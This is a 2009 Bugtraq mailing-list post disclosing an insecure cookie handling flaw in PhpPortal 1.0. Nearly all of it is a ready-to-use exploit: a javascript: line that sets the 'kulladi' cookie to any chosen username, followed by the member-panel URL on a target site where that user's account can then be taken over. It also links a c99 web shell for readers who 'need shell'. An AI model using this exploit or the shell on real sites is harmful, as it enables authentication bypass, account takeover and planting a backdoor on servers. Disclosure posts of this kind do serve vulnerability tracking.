
Date: 21 Jun 2009 19:03:05 -0000
From: ceza_fuat_kolik@...mail.com
To: bugtraq@...urityfocus.com
Subject: phportal 1.0 Insecure Cookie Handling Vulnerability

########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author :  xhaxkerx
Special Thankz : yasin
Script : http://phportal.mertindualari.com
site : http://www.c99.mobi

########################################################

Exploit;

javascript:document.cookie="kulladi=[Username];path=/";
Enter..

Go To; http://target.com/uye_paneli.php?islem=bilgilerim

# if you need shell http://www.c99.mobi/c99.txt

########################################################
